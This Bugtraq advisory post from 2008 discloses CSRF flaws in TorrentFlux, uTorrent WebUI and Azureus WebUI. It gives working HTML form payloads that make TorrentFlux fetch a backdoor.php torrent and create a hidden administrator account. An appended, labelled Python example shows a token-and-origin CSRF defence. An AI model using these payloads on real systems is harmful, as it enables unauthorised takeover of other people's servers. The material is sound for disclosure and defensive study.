
Bugtraq mailing list archives

BitTorrent Clients and CSRF
From: th3.r00k.nospam () pork gmail com
Date: 18 Apr 2008 08:33:51 -0000

The following are proof of concept exploits against three BitTorrent clients: uTorrent's WebUI, Azureus's "HTML WebUI",
and TorrentFlux.

More information:

TorrentFlux v2.3 (Latest)

If you force TorrentFlux to download a torrent that contains a file backdoor.php you will be able to execute it by 
browsing here:
You do not have to know a password to access this folder, but you will have to know the username.
<form id='file_attack' method="post" action="http://localhost/torrentflux_2.3/html/index.php">
<input type=hidden name="url_upload" value="http://localhost/backdoor.php.torrent">
<input type=submit value='file attack'>
</form>

Add an administrative account:
<form id='create_admin' method="post" action="http://localhost/torrentflux_2.3/html/admin.php?op=addUser">
<input type=hidden name="newUser" value="sadmin">
<input type=hidden name="pass1" value="password">
<input type=hidden name="pass2" value="password">
<input type=hidden name="userType" value=1>
<input type=submit value='create admin'>
</form>

uTorrent’s WebUI is also affected:
force file download:

uTorrent change administrative login information:
After the username or password has been changed, the browser must re-authenticate.
So is Azureus's HTML WebUI:
Force file download:
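
A server-side check that would reject the cross-site form posts shown in this message, as an added example that is not part of the original post or of any of the three projects' code. Python is used for illustration (TorrentFlux itself is PHP), and the `csrf_token` field, the `TRUSTED_ORIGIN` value and the function names are assumptions.

```python
import hashlib
import hmac
import secrets
from urllib.parse import urlsplit

TRUSTED_ORIGIN = "http://localhost"  # assumption: origin serving the admin UI


def issue_csrf_token(session_key: bytes, session_id: str) -> str:
    """Per-session token: HMAC-SHA256(session_key, session_id), hex-encoded."""
    return hmac.new(session_key, session_id.encode(), hashlib.sha256).hexdigest()


def same_origin(headers: dict) -> bool:
    """True only if Origin (or, failing that, Referer) names our own origin."""
    source = headers.get("Origin") or headers.get("Referer")
    if not source:
        return False  # fail closed when the browser sent neither header
    parts = urlsplit(source)
    return f"{parts.scheme}://{parts.netloc}" == TRUSTED_ORIGIN


def allow_state_change(method, headers, form, session_key, session_id) -> bool:
    """Gate to run before handlers like op=addUser or the url_upload POST."""
    if method != "POST" or not same_origin(headers):
        return False
    expected = issue_csrf_token(session_key, session_id)
    supplied = form.get("csrf_token", "")  # hypothetical hidden field name
    return hmac.compare_digest(expected.encode(), supplied.encode())


def demo():
    """Constructed requests: a cross-site form post, then the UI's own form."""
    key, sid = secrets.token_bytes(32), "constructed-session-id"
    fields = {"newUser": "sadmin", "pass1": "password",
              "pass2": "password", "userType": "1"}
    forged = allow_state_change(
        "POST", {"Origin": "http://other-site.example"}, fields, key, sid)
    own = dict(fields, csrf_token=issue_csrf_token(key, sid))
    legit = allow_state_change("POST", {"Origin": TRUSTED_ORIGIN}, own, key, sid)
    return forged, legit


if __name__ == "__main__":
    print(demo())
```

The token is bound to the session identifier, so a value issued to one session is rejected in another, and a request carrying the right cookie but no token fails even when the Origin check passes.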
